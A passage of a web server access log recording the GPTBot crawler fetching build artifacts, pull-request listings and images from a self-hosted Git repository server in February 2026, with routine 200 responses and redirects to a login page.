GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=source" [Client 74.7.227.38] [Length 13156] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:19:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=rendered" [Client 74.7.227.38] [Length 11128] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:19:52:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:19:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:19:52:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:19:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:19:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=source" [Client 74.7.227.38] [Length 13156] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:19:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=source" [Client 74.7.227.38] [Length 13155] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:19:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=source" [Client 74.7.227.38] [Length 13153] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:19:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:19:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:19:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=source" [Client 74.7.227.38] [Length 14833] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache?display=rendered" [Client 74.7.227.38] [Length 11184] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" +[17/Feb/2026:19:53:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" +[17/Feb/2026:19:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11243] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:19:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=rendered" [Client 74.7.227.38] [Length 10989] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=source" [Client 74.7.227.38] [Length 554574] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=source" [Client 74.7.227.38] [Length 554530] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh?display=source" [Client 74.7.227.38] [Length 14764] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" +[17/Feb/2026:19:53:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:19:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:19:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=source" [Client 74.7.227.38] [Length 13154] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:19:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11174] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11174] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11118] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" +[17/Feb/2026:19:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr 